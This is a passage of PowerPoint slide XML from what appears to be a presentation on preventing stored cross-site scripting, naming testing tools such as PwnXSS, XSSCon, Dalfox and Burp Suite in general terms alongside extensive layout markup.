              </a:solidFill>
            </p:spPr>
          </p:sp>
        </p:grpSp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr name="TextBox 6" id="6"/>
            <p:cNvSpPr txBox="true"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="0">
              <a:off x="2866991" y="454542"/>
              <a:ext cx="18149091" cy="1119927"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
          <p:txBody>
            <a:bodyPr anchor="t" rtlCol="false" tIns="0" lIns="0" bIns="0" rIns="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr" marL="0" indent="0" lvl="0">
                <a:lnSpc>
                  <a:spcPts val="6547"/>
                </a:lnSpc>
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="5456">
                  <a:solidFill>
                    <a:srgbClr val="FFFFFF"/>
                  </a:solidFill>
                  <a:latin typeface="Sifonn"/>
                </a:rPr>
                <a:t>CONCLUSION</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr name="Group 7" id="7"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm rot="0">
            <a:off x="337322" y="2965764"/>
            <a:ext cx="17613356" cy="6292536"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="23484474" cy="8390048"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr name="Group 8" id="8"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm rot="0">
              <a:off x="0" y="0"/>
              <a:ext cx="23484474" cy="8390048"/>
              <a:chOff x="0" y="0"/>
              <a:chExt cx="12620302" cy="4508721"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr name="Freeform 9" id="9"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm flipH="false" flipV="false">
                <a:off x="0" y="0"/>
                <a:ext cx="12620303" cy="4508721"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst/>
                <a:ahLst/>
                <a:cxnLst/>
                <a:rect r="r" b="b" t="t" l="l"/>
                <a:pathLst>
                  <a:path h="4508721" w="12620303">
                    <a:moveTo>
                      <a:pt x="12495842" y="4508721"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="124460" y="4508721"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="55880" y="4508721"/>
                      <a:pt x="0" y="4452841"/>
                      <a:pt x="0" y="4384261"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="0" y="124460"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="55880"/>
                      <a:pt x="55880" y="0"/>
                      <a:pt x="124460" y="0"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="12495843" y="0"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="12564422" y="0"/>
                      <a:pt x="12620303" y="55880"/>
                      <a:pt x="12620303" y="124460"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="12620303" y="4384261"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="12620303" y="4452841"/>
                      <a:pt x="12564422" y="4508721"/>
                      <a:pt x="12495843" y="4508721"/>
                    </a:cubicBezTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:solidFill>
                <a:srgbClr val="4A83A1">
                  <a:alpha val="78824"/>
                </a:srgbClr>
              </a:solidFill>
            </p:spPr>
          </p:sp>
        </p:grpSp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr name="TextBox 10" id="10"/>
            <p:cNvSpPr txBox="true"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="0">
              <a:off x="273376" y="589329"/>
              <a:ext cx="22568290" cy="6468411"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
          <p:txBody>
            <a:bodyPr anchor="t" rtlCol="false" tIns="0" lIns="0" bIns="0" rIns="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="just">
                <a:lnSpc>
                  <a:spcPts val="4843"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="3459">
                  <a:solidFill>
                    <a:srgbClr val="FFD659"/>
                  </a:solidFill>
                  <a:latin typeface="League Spartan"/>
                </a:rPr>
                <a:t>In conclusion, the project focuses on preventing Stored XSS attacks in a localhost web platform by exploring different attack vectors and implementing various prevention techniques. The use of tools like PwnXSS, XSSCon, Dalfox, XSSer, Burpsuite, and Webgoat is vital in detecting vulnerabilities and developing effective prevention strategies. The project aims to promote secure coding practices and raise awareness about the risks of Stored XSS attacks, ultimately contributing to better web application development practices.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02D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3541" y="3643488"/>
            <a:ext cx="18495081" cy="7398032"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="TextBox 3" id="3"/>
          <p:cNvSpPr txBox="true"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="1332892" y="1713922"/>
            <a:ext cx="15622216" cy="1476321"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t" rtlCol="false" tIns="0" lIns="0" bIns="0" rIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr" marL="0" indent="0" lvl="0">
              <a:lnSpc>
                <a:spcPts val="11759"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="9799">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="League Spart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1" r="0" b="331"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm flipH="false" flipV="false">
            <a:off x="0" y="0"/>
            <a:ext cx="18288000" cy="10287000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr name="Group 3" id="3"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm rot="0">
            <a:off x="2958374" y="4091826"/>
            <a:ext cx="12371252" cy="2911623"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="9234890" cy="2173468"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr name="Freeform 4" id="4"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipH="false" flipV="false">
              <a:off x="0" y="0"/>
              <a:ext cx="9234891" cy="2173468"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect r="r" b="b" t="t" l="l"/>
              <a:pathLst>
                <a:path h="2173468" w="9234891">
                  <a:moveTo>
                    <a:pt x="9110431" y="2173468"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="124460" y="2173468"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="55880" y="2173468"/>
                    <a:pt x="0" y="2117588"/>
                    <a:pt x="0" y="2049008"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="0" y="124460"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="55880"/>
                    <a:pt x="55880" y="0"/>
                    <a:pt x="124460" y="0"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="9110431" y="0"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="9179010" y="0"/>
                    <a:pt x="9234891" y="55880"/>
                    <a:pt x="9234891" y="124460"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="9234891" y="2049008"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="9234891" y="2117588"/>
                    <a:pt x="9179010" y="2173468"/>
                    <a:pt x="9110431" y="2173468"/>
                  </a:cubicBezTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="4A83A1">
                <a:alpha val="50980"/>
              </a:srgbClr>
            </a:solidFill>
          </p:spPr>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="TextBox 5" id="5"/>
          <p:cNvSpPr txBox="true"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="2163134" y="4574871"/>
            <a:ext cx="13961731" cy="2174769"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t" rtlCol="false" tIns="0" lIns="0" bIns="0" rIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPts val="8749"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="6249">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="League Spartan"/>
              </a:rPr>
              <a:t>Stored Cross-site Scripting Attacks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343" t="37179" r="607" b="19256"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm flipH="false" flipV="false">
            <a:off x="0" y="0"/>
            <a:ext cx="18288000" cy="10287000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr name="Group 3" id="3"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm rot="0">
            <a:off x="532244" y="3724407"/>
            <a:ext cx="3683709" cy="4740316"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="3133810" cy="4032689"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr name="Freeform 4" id="4"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipH="false" flipV="false">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4A83A1">
                <a:alpha val="67843"/>
              </a:srgbClr>
            </a:solidFill>
          </p:spPr>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr name="Group 5" id="5"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm rot="0">
            <a:off x="9466057" y="3724407"/>
            <a:ext cx="3683709" cy="4740316"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="3133810" cy="4032689"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr name="Freeform 6" id="6"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipH="false" flipV="false">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4A83A1">
                <a:alpha val="67843"/>
              </a:srgbClr>
            </a:solidFill>
          </p:spPr>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr name="Group 7" id="7"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm rot="0">
            <a:off x="5001298" y="3724407"/>
            <a:ext cx="3683709" cy="4740316"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="3133810" cy="4032689"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr name="Freeform 8" id="8"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipH="false" flipV="false">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4A83A1">
                <a:alpha val="67843"/>
              </a:srgbClr>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3792" y="4153997"/>
            <a:ext cx="1383441" cy="1383441"/>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158003" y="4153997"/>
            <a:ext cx="1383441" cy="1383441"/>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628107" y="4153997"/>
            <a:ext cx="1383441" cy="1383441"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr name="Group 12" id="12"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm rot="0">
            <a:off x="13718975" y="3724407"/>
            <a:ext cx="3683709" cy="4740316"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="3133810" cy="4032689"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr name="Freeform 13" id="13"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipH="false" flipV="false">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4A83A1">
                <a:alpha val="67843"/>
              </a:srgbClr>
            </a:solidFill>
          </p:spPr>
        </p:sp>
      </p:gr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869109" y="4153997"/>
            <a:ext cx="1383441" cy="1383441"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="TextBox 15" id="15"/>
          <p:cNvSpPr txBox="true"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="1473792" y="1028700"/>
            <a:ext cx="14893360" cy="1285875"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t" rtlCol="false" tIns="0" lIns="0" bIns="0" rIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr" marL="0" indent="0" lvl="0">
              <a:lnSpc>
                <a:spcPts val="10199"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="8499">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Sifonn"/>
              </a:rPr>
              <a:t>Tools Used</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="TextBox 16" id="16"/>
          <p:cNvSpPr txBox="true"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="1028700" y="6100464"/>
            <a:ext cx="2913784" cy="878787"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t" rtlCol="false" tIns="0" lIns="0" bIns="0" rIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPts val="7209"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="5149">
                <a:solidFill>
                  <a:srgbClr val="FEEB54"/>
                </a:solidFill>
                <a:latin typeface="League Spartan"/>
              </a:rPr>
              <a:t>PwnXSS</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="TextBox 17" id="17"/>
          <p:cNvSpPr txBox="true"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="5470696" y="6092195"/>
            <a:ext cx="2758056" cy="878787"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t" rtlCol="false" tIns="0" lIns="0" bIns="0" rIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPts val="7209"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="5149">
                <a:solidFill>
                  <a:srgbClr val="FEEB54"/>
                </a:solidFill>
                <a:latin typeface="League Spartan"/>
              </a:rPr>
              <a:t>XSSCon</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="TextBox 18" id="18"/>
          <p:cNvSpPr txBox="true"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="10227023" y="6092195"/>
            <a:ext cx="2185609" cy="862250"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t" rtlCol="false" tIns="0" lIns="0" bIns="0" rIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPts val="7069"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="5049">
                <a:solidFill>
                  <a:srgbClr val="FEEB54"/>
                </a:solidFill>
                <a:latin typeface="League Spartan"/>
              </a:rPr>
              <a:t>Dalfox</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="TextBox 19" id="19"/>
          <p:cNvSpPr txBox="true"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="13793634" y="6092195"/>
            <a:ext cx="3465666" cy="862250"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t" rtlCol="false" tIns="0" lIns="0" bIns="0" rIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPts val="7069"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="5049">
                <a:solidFill>
                  <a:srgbClr val="FEEB54"/>
                </a:solidFill>
                <a:latin typeface="League Spartan"/>
              </a:rPr>
              <a:t>Burp Suite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343" t="37179" r="607" b="19256"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm flipH="false" flipV="false">
            <a:off x="0" y="0"/>
            <a:ext cx="18288000" cy="10287000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr name="Group 3" id="3"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm rot="0">
            <a:off x="2509497" y="3074700"/>
            <a:ext cx="13269006" cy="6011189"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="12273304" cy="5560112"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr name="Freeform 4" id="4"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipH="false" flipV="false">
              <a:off x="0" y="0"/>
              <a:ext cx="12273304" cy="5560112"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect r="r" b="b" t="t" l="l"/>
              <a:pathLst>
                <a:path h="5560112" w="12273304">
                  <a:moveTo>
                    <a:pt x="12148844" y="5560111"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="124460" y="5560111"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="55880" y="5560111"/>
                    <a:pt x="0" y="5504231"/>
                    <a:pt x="0" y="5435652"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="0" y="124460"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="55880"/>
                    <a:pt x="55880" y="0"/>
                    <a:pt x="124460" y="0"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="12148844" y="0"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="12217424" y="0"/>
                    <a:pt x="12273304" y="55880"/>
                    <a:pt x="12273304" y="124460"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="12273304" y="5435652"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="12273304" y="5504231"/>
                    <a:pt x="12217424" y="5560112"/>
                    <a:pt x="12148844" y="5560112"/>
                  </a:cubicBezTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="4A83A1">
                <a:alpha val="66667"/>
              </a:srgbClr>
            </a:solidFill>
          </p:spPr>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="TextBox 5" id="5"/>
          <p:cNvSpPr txBox="true"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="1697320" y="1019175"/>
            <a:ext cx="14893360" cy="1419198"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t" rtlCol="false" tIns="0" lIns="0" bIns="0" rIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr" marL="0" indent="0" lvl="0">
              <a:lnSpc>
                <a:spcPts val="11159"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="9299">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Sifonn"/>
              </a:rPr>
              <a:t>PwnXSS</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="TextBox 6" id="6"/>
          <p:cNvSpPr txBox="true"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="2726066" y="3125290"/>
            <a:ext cx="12422667" cy="6403721"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t" rtlCol="false" tIns="0" lIns="0" bIns="0" rIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="just" marL="820419" indent="-410209" lvl="1">
              <a:lnSpc>
                <a:spcPts val="5661"/>
              </a:lnSpc>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3799">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Sifonn Bold"/>
              </a:rPr>
              <a:t>PwnXSS is an open-source tool for testing and exploiting XSS vulnerabilities in web applications.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just" marL="820419" indent="-410209" lvl="1">
              <a:lnSpc>
                <a:spcPts val="5661"/>
              </a:lnSpc>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3799">
                <a:solidFill>
                  <a:srgbClr val="FEEB54"/>
                </a:solidFill>
                <a:latin typeface="Sifonn Bold"/>
              </a:rPr>
              <a:t>It can identify and exploit different types of XSS vulnerabilities, including Reflected, Stored, and DOM-based XSS.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just" marL="820419" indent="-410209" lvl="1">
              <a:lnSpc>
                <a:spcPts val="5661"/>
              </a:lnSpc>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3799" u="none">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Sifonn Bold"/>
              </a:rPr>
              <a:t>The tool generates malicious payloads to test applications and identify potential security weaknesses.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just" marL="0" indent="0" lvl="0">
              <a:lnSpc>
                <a:spcPts val="566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343" t="37179" r="607" b="19256"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm flipH="false" flipV="false">
            <a:off x="0" y="0"/>
            <a:ext cx="18288000" cy="10287000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr name="Group 3" id="3"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm rot="0">
            <a:off x="2509497" y="2705689"/>
            <a:ext cx="13269006" cy="6552611"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="12273304" cy="6060906"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr name="Freeform 4" id="4"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipH="false" flipV="false">
              <a:off x="0" y="0"/>
              <a:ext cx="12273304" cy="6060906"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect r="r" b="b" t="t" l="l"/>
              <a:pathLst>
                <a:path h="6060906" w="12273304">
                  <a:moveTo>
                    <a:pt x="12148844" y="6060906"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="124460" y="6060906"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="55880" y="6060906"/>
                    <a:pt x="0" y="6005026"/>
                    <a:pt x="0" y="5936446"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="0" y="124460"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="55880"/>
                    <a:pt x="55880" y="0"/>
                    <a:pt x="124460" y="0"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="12148844" y="0"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="12217424" y="0"/>
                    <a:pt x="12273304" y="55880"/>
                    <a:pt x="12273304" y="124460"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="12273304" y="5936446"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="12273304" y="6005026"/>
                    <a:pt x="12217424" y="6060906"/>
                    <a:pt x="12148844" y="6060906"/>
                  </a:cubicBezTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="4A83A1">
                <a:alpha val="66667"/>
              </a:srgbClr>
            </a:solidFill>
          </p:spPr>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="TextBox 5" id="5"/>
          <p:cNvSpPr txBox="true"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="1697320" y="1019175"/>
            <a:ext cx="14893360" cy="1419198"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t" rtlCol="false" tIns="0" lIns="0" bIns="0" rIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr" marL="0" indent="0" lvl="0">
              <a:lnSpc>
                <a:spcPts val="11159"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="9299">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Sifonn"/>
              </a:rPr>
              <a:t>XSSCon</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="TextBox 6" id="6"/>
          <p:cNvSpPr txBox="true"/>
          <p:nvPr/>
        </p:nvSpPr>
